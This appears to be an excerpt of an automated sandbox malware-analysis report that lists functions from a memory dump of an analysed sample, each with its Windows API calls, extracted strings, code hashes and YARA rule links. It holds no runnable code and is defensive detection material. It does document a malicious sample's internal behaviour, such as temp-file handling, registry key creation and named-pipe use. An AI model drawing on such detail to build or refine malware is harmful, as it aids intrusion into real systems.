                                                            • Opcode ID: 17d31913981541376169d0ea3640b13f21433654f5c941a205e3b6f24e5f6cb5
                                                            • Instruction ID: e3f24a4bcbcc26b56a0ce04e2eb853c44d233a0c849e5417508cf1b31be05f05
                                                            • Opcode Fuzzy Hash: 17d31913981541376169d0ea3640b13f21433654f5c941a205e3b6f24e5f6cb5
                                                            • Instruction Fuzzy Hash: C7418D72600205BBEF318F65DCC5FBA3BA8EB48349F080065F945DB140DBB5ED51DAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB1841, Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04BB1887
                                                            • StrTrimA.SHLWAPI(?,?), ref: 04BB18A5
                                                            • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 04BB190E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 04BB192F
                                                            • DeleteFileA.KERNEL32(?,00003219), ref: 04BB1951
                                                            • HeapFree.KERNEL32(00000000,?), ref: 04BB1960
                                                            • HeapFree.KERNEL32(00000000,?,00003219), ref: 04BB1978
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 1078934163-0
                                                            • Opcode ID: 8445be87755b77ebb49548abdecbaa52cdec2611d58b6fcb6015fc7fff8ab556
                                                            • Instruction ID: a1df7c9ae364920483ad0b56720104f7c63dddcf02e426a4d34b02c9336667a6
                                                            • Opcode Fuzzy Hash: 8445be87755b77ebb49548abdecbaa52cdec2611d58b6fcb6015fc7fff8ab556
                                                            • Instruction Fuzzy Hash: 6A31B132604205AFE311AB58DC84FAA77ECEB59784F094455F684E7190D7A8FD068BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBDE22, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,04BA2DC7), ref: 04BBDE3C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 04BBDE51
                                                            • memset.NTDLL ref: 04BBDE5E
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0000001A,?,?,04BA2DC6,?,?), ref: 04BBDE7B
                                                            • memcpy.NTDLL(?,?,04BA2DC6,?,0000001A,?,?,04BA2DC6,?,?), ref: 04BBDE9C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocate$Freememcpymemset
                                                            • String ID: chun
                                                            • API String ID: 2362494589-3058818181
                                                            • Opcode ID: fdaf6050891c6a15a4034de7486c26a1cc988c28e7ccad4d497697467bb44a0a
                                                            • Instruction ID: 7171271fdd1414af36bcaa50e1e8876b7284d043ec9e4706e9987fd332f5393c
                                                            • Opcode Fuzzy Hash: fdaf6050891c6a15a4034de7486c26a1cc988c28e7ccad4d497697467bb44a0a
                                                            • Instruction Fuzzy Hash: 5E319E71504706AFD7209F55D880AA7BBEDEF18314F05486AE989C7220D7B4FD05CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA3EC6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • lstrlen.KERNEL32(00000000,?,00000F00), ref: 04BA3EEA
                                                              • Part of subcall function 04BAB869: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,04BA3F0E,?,00000000,000000FF,?,00000F00), ref: 04BAB87A
                                                              • Part of subcall function 04BAB869: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,04BA3F0E,?,00000000,000000FF,?,00000F00), ref: 04BAB881
                                                              • Part of subcall function 04BAB869: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04BAB893
                                                              • Part of subcall function 04BAB869: _snprintf.NTDLL ref: 04BAB8B9
                                                              • Part of subcall function 04BAB869: _snprintf.NTDLL ref: 04BAB8ED
                                                              • Part of subcall function 04BAB869: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 04BAB90A
                                                            • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 04BA3F84
                                                            • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 04BA3FA1
                                                            • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 04BA3FA9
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 04BA3FB8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                            • String ID: s:
                                                            • API String ID: 2960378068-2363032815
                                                            • Opcode ID: fc7e26e031b03a938fb8c1466c8cb71784031b10158ba5cd0e9fb39ab700fb8d
                                                            • Instruction ID: 7885f02df3cb07d0fa1ece0d44fc25e71f7dd6e9942ac188845656eff74f5675
                                                            • Opcode Fuzzy Hash: fc7e26e031b03a938fb8c1466c8cb71784031b10158ba5cd0e9fb39ab700fb8d
                                                            • Instruction Fuzzy Hash: 22312D72904209AFDB109FA9DCC4FEEBBFCEB08214F050595E615E3141EB75AA158B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAA6F7, Relevance: 10.6, APIs: 7, Instructions: 89memorystringpipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(04BA47C4,00000000,00000000,?,?,?,04BA47C4,00000035,00000000,-00000005,00000000), ref: 04BAA727
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BAA73D
                                                            • memcpy.NTDLL(00000010,04BA47C4,00000000,?,?,04BA47C4,00000035,00000000), ref: 04BAA773
                                                            • memcpy.NTDLL(00000010,00000000,00000035,?,?,04BA47C4,00000035), ref: 04BAA78E
                                                            • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04BAA7AC
                                                            • GetLastError.KERNEL32(?,?,04BA47C4,00000035), ref: 04BAA7B6
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04BA47C4,00000035), ref: 04BAA7D9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                            • String ID:
                                                            • API String ID: 2237239663-0
                                                            • Opcode ID: 49717282269fcf62bf42f175149d99c06a325c73d1df06aa7b30aecce950872c
                                                            • Instruction ID: 8aed11bf571e16f636e94bea7cacab6f6cd64ca5d6758deade1fb4d5fff98566
                                                            • Opcode Fuzzy Hash: 49717282269fcf62bf42f175149d99c06a325c73d1df06aa7b30aecce950872c
                                                            • Instruction Fuzzy Hash: 8B317F36900209EBDB218F65D884EABBBB8EB4C751F004466E955D3200E234E964DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBCDEA, Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BBCE00
                                                            • lstrcmpiW.KERNEL32(00000000,?,73BCF710,?,?,?,04BB3066), ref: 04BBCE38
                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,04BB3066), ref: 04BBCE4D
                                                            • lstrlenW.KERNEL32(?,?,?,?,04BB3066), ref: 04BBCE54
                                                            • CloseHandle.KERNEL32(?,?,?,?,04BB3066), ref: 04BBCE7C
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,04BB3066), ref: 04BBCEA8
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BBCEC6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                            • String ID:
                                                            • API String ID: 1496873005-0
                                                            • Opcode ID: 95468885db579676b5f03b051de5f27e017dd62b3a9bcf7c91a8c5e1fbc45ab3
                                                            • Instruction ID: 5513591212064b6162fd9db0e7afcc378b87b3e3351c72d57c4257606138214d
                                                            • Opcode Fuzzy Hash: 95468885db579676b5f03b051de5f27e017dd62b3a9bcf7c91a8c5e1fbc45ab3
                                                            • Instruction Fuzzy Hash: 9521FB72900205EBEB209FB5DCC4EBF7BBCEF08645B04099AA545E2101DBB4F9059BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBEE4F, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(04BA717C,00000000,04BCC320,04BCC340,?,?,04BA717C,04BA2555,04BCC320), ref: 04BBEE5F
                                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04BBEE75
                                                            • lstrlen.KERNEL32(04BA2555,?,?,04BA717C,04BA2555,04BCC320), ref: 04BBEE7D
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BBEE89
                                                            • lstrcpy.KERNEL32(04BCC320,04BA717C), ref: 04BBEE9F
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04BA717C,04BA2555,04BCC320), ref: 04BBEEF3
                                                            • HeapFree.KERNEL32(00000000,04BCC320,?,?,04BA717C,04BA2555,04BCC320), ref: 04BBEF02
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                            • String ID:
                                                            • API String ID: 1531811622-0
                                                            • Opcode ID: 736f5703f4336a9aca4655762a7af32779d378843dfce3bbb9dcc106564504cc
                                                            • Instruction ID: e4b3d221d84a0b774cb53bd77055a2bb3bf8180951f9da85708bed08ad1d3b28
                                                            • Opcode Fuzzy Hash: 736f5703f4336a9aca4655762a7af32779d378843dfce3bbb9dcc106564504cc
                                                            • Instruction Fuzzy Hash: 44219531104245EFEB224F65DC84FFA7FAAEB4A350F15409AE89497261C775EC45CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAC46F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,04BA2273,00000000), ref: 04BAC493
                                                              • Part of subcall function 04BBAC39: lstrcpy.KERNEL32(-000000FC,00000000), ref: 04BBAC73
                                                              • Part of subcall function 04BBAC39: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,04BAC4A0,?,?,00000000,?,04BA2273,00000000), ref: 04BBAC85
                                                              • Part of subcall function 04BBAC39: GetTickCount.KERNEL32 ref: 04BBAC90
                                                              • Part of subcall function 04BBAC39: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,04BAC4A0,?,?,00000000,?,04BA2273,00000000), ref: 04BBAC9C
                                                              • Part of subcall function 04BBAC39: lstrcpy.KERNEL32(00000000), ref: 04BBACB6
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • lstrcpy.KERNEL32(00000000), ref: 04BAC4CE
                                                            • wsprintfA.USER32 ref: 04BAC4E1
                                                            • GetTickCount.KERNEL32 ref: 04BAC4F6
                                                            • wsprintfA.USER32 ref: 04BAC50B
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                            • String ID: "%S"
                                                            • API String ID: 1152860224-1359967185
                                                            • Opcode ID: 5de4ebd98a33dd13b8e82b8aad5345c2eec0418bd519ac2d1ec93539393ed795
                                                            • Instruction ID: bcf0dd9a24756439ebecb91c80c20630f81d242abda2d59300f40eb092b42f24
                                                            • Opcode Fuzzy Hash: 5de4ebd98a33dd13b8e82b8aad5345c2eec0418bd519ac2d1ec93539393ed795
                                                            • Instruction Fuzzy Hash: E711AF729043196BE2107B68ECC4EAF3BECEF48615F058099F909A3201CE78FC118BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA8DB4, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,04BB77BB,?), ref: 04BA8DF5
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,04BB77BB,?,00000000,00000000,00000000,00000000,00000000), ref: 04BA8E68
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 2078930461-0
                                                            • Opcode ID: 8d84a96ad898ad67d1a33277285d3b80d76dd285af0aa21504591999d44a523b
                                                            • Instruction ID: 0c1e3f851b5c0b50561fb398a7c2059f2e8d37f4364d4191eca970213ceb23d5
                                                            • Opcode Fuzzy Hash: 8d84a96ad898ad67d1a33277285d3b80d76dd285af0aa21504591999d44a523b
                                                            • Instruction Fuzzy Hash: B411BF31148319FBE7312B21ECC9F6F3F6DEB49761F000926F601A6591D66AAC6486F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB7DB7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BA9622: lstrlen.KERNEL32(00000000,00000000,73BB81D0,00000000,?,?,?,04BB7DD0,?,00000000,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BA9689
                                                              • Part of subcall function 04BA9622: sprintf.NTDLL ref: 04BA96AA
                                                            • lstrlen.KERNEL32(00000000,73BB81D0,?,00000000,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7DE2
                                                            • lstrlen.KERNEL32(?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7DEA
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • strcpy.NTDLL ref: 04BB7E01
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BB7E0C
                                                              • Part of subcall function 04BB1766: lstrlen.KERNEL32(?,?,?,00000000,?,04BB7E1B,00000000,?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB1777
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7E29
                                                              • Part of subcall function 04BC1D0B: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04BB7E35,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BC1D15
                                                              • Part of subcall function 04BC1D0B: _snprintf.NTDLL ref: 04BC1D73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                            • String ID: =
                                                            • API String ID: 2864389247-1428090586
                                                            • Opcode ID: 1893ae2446c19fe060e6262871f0d39ba28a7364ec2c4ad0130fd68cc0d0d02b
                                                            • Instruction ID: 999bdffc7e2aa82ce696f3987188a6ccbbc6d96cfc79c74a163836c6abbcd6ac
                                                            • Opcode Fuzzy Hash: 1893ae2446c19fe060e6262871f0d39ba28a7364ec2c4ad0130fd68cc0d0d02b
                                                            • Instruction Fuzzy Hash: 03119E779012296757127BB89CC4CBF36ADDE89A59309809AFA05A7200DE78ED0257E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BBAC39, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • lstrcpy.KERNEL32(-000000FC,00000000), ref: 04BBAC73
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,04BAC4A0,?,?,00000000,?,04BA2273,00000000), ref: 04BBAC85
                                                            • GetTickCount.KERNEL32 ref: 04BBAC90
                                                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,04BAC4A0,?,?,00000000,?,04BA2273,00000000), ref: 04BBAC9C
                                                            • lstrcpy.KERNEL32(00000000), ref: 04BBACB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                                            • String ID: \Low
                                                            • API String ID: 1629304206-4112222293
                                                            • Opcode ID: 5d1719a4b44523756ae69cf7de7e306110d090a5304f0a7bd96e9e1d132e5250
                                                            • Instruction ID: e42c17a0221c6361cb353fc29dcd9d16ff901c36345b62008d5831bfe788c14b
                                                            • Opcode Fuzzy Hash: 5d1719a4b44523756ae69cf7de7e306110d090a5304f0a7bd96e9e1d132e5250
                                                            • Instruction Fuzzy Hash: C001C031A016187BD2122B75DC8CFAF779CDF8D602B054062F551D3180DB98FD0086F4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB45BD, Relevance: 10.6, APIs: 7, Instructions: 57memoryregistrystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(04BA2555,00000000,00000000,04BCC340,?,?,04BA718B,04BA2555,00000000,04BA2555,04BCC320), ref: 04BB45D0
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04BB45DE
                                                            • wsprintfA.USER32 ref: 04BB45FA
                                                            • RegCreateKeyA.ADVAPI32(80000001,04BCC320,00000000), ref: 04BB4612
                                                            • lstrlen.KERNEL32(?), ref: 04BB4621
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BB463A
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BB4649
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
                                                            • String ID:
                                                            • API String ID: 3908752696-0
                                                            • Opcode ID: 549602fa735d90e84575be9ab7142e382f018c5d2ecb125fd4eff7e4b6ec0945
                                                            • Instruction ID: 55a70b0cf6cad8df0c806cd089fd5480023eeea76d826ff4394ca15e7db68ca4
                                                            • Opcode Fuzzy Hash: 549602fa735d90e84575be9ab7142e382f018c5d2ecb125fd4eff7e4b6ec0945
                                                            • Instruction Fuzzy Hash: A9113932100108FFDB015FA5ECC9EAE3B7DFB48715F100026FA0597160DAB6AD649BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAB7B9, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wsprintfA.USER32 ref: 04BAB7CC
                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 04BAB7DE
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04BAB808
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BAB81B
                                                            • CloseHandle.KERNEL32(?), ref: 04BAB824
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                                            • String ID: 0x%08X
                                                            • API String ID: 603522830-3182613153
                                                            • Opcode ID: 579f46205267ede8afbe39f2cc418cf48cad078306168056949af3f0f1a7e801
                                                            • Instruction ID: 8cbe04370bcd3eaa746e0133eacd5cefae718051c90b678b24b3cc85879108fe
                                                            • Opcode Fuzzy Hash: 579f46205267ede8afbe39f2cc418cf48cad078306168056949af3f0f1a7e801
                                                            • Instruction Fuzzy Hash: B7015E71904119BBCB109BA4DC89DEF7F7CEF09351F004155E526E2181DB74AA11CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA3543, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetLastError.KERNEL32(?,?,?,00001000), ref: 04BA35C4
                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 04BA3649
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BA3663
                                                            • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 04BA3698
                                                              • Part of subcall function 04BC3C5F: RtlReAllocateHeap.NTDLL(00000000,?,?,04BA3607), ref: 04BC3C6F
                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 04BA371A
                                                            • CloseHandle.KERNEL32(?), ref: 04BA3741
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                                            • String ID:
                                                            • API String ID: 3115907006-0
                                                            • Opcode ID: a80e40135b80b754de335e528898440573f97e8b50b2560b929a314cc0a56279
                                                            • Instruction ID: 86d1d0e39864aa6200dbd19b4b336b32e79fcb344ebb179a9cfb30edc0a60958
                                                            • Opcode Fuzzy Hash: a80e40135b80b754de335e528898440573f97e8b50b2560b929a314cc0a56279
                                                            • Instruction Fuzzy Hash: F4812A71E08219EFDF11CF98C984AAEBBF5FF08744F149499E805AB250D731AD60DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BAF0C0, Relevance: 9.1, APIs: 6, Instructions: 121memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 04BAF0D9
                                                              • Part of subcall function 04BB93FF: lstrlenW.KERNEL32(00000000,73BCF560,00000000,?,00000000), ref: 04BB942B
                                                              • Part of subcall function 04BB93FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB943D
                                                              • Part of subcall function 04BB93FF: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04BB945A
                                                              • Part of subcall function 04BB93FF: lstrlenW.KERNEL32(00000000), ref: 04BB9466
                                                              • Part of subcall function 04BB93FF: HeapFree.KERNEL32(00000000,00000000), ref: 04BB947A
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BAF111
                                                            • CloseHandle.KERNEL32(?), ref: 04BAF11F
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 04BAF1F1
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BAF200
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 04BAF213
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                            • String ID:
                                                            • API String ID: 1719504581-0
                                                            • Opcode ID: 23d112145548f5b572aab2e593447dba655921d58f04cf1c1bafbd165e65e798
                                                            • Instruction ID: 349f3ad59028a846258469c10a3e8c25b71039080f405104bc99752072c92107
                                                            • Opcode Fuzzy Hash: 23d112145548f5b572aab2e593447dba655921d58f04cf1c1bafbd165e65e798
                                                            • Instruction Fuzzy Hash: 56418D36604606EBDB219F94D8C8EEA7BB9FB48704F0100A6E904AB110DB74FD64CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

